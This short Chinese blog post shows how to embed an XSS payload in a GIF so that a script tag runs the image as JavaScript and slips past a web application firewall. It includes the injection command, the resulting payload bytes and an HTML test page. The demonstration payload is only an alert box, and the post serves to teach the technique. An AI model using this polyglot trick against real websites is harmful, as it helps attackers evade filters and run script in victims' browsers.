假设如果XSS的PayLoad被拦截,那么把XSS的PayLoad放到载体里面,这样会不会Bypass呢?
一个正常的gif
图片加上一个XSS的PayLoad,然后通过脚本将XssPayload
注入到图片里面:
利用Python脚本将PayLoad注入到图片里面
python jsingif.py -i hack.gif "javascript:alert('Power_Liu')"
然后用记事本打开图片看看:
可以看出:图片末尾有这样一串代码:*/=1;javascript:alert('Power_Liu');
为了验证这个XSS
是否生效,这里用到Html
测试代码:
<html>
<head>
<title>Power_Liu—Test-XSS</title>
</head>
<body>
<img src="hack.gif"\>
<script src= "hack.gif"> </script>
</body>
</html>
</html>
打开后的testxss.html:
script标签把图片当成JavaScript代码执行了,因为我们把乱码的数据通过多行注释/**/给注释掉了,所以JavaScript会执行我们的PayLoad,这样可以绕过WAF
By:Power_Liu
Qq:211124332
文章地址:博客
)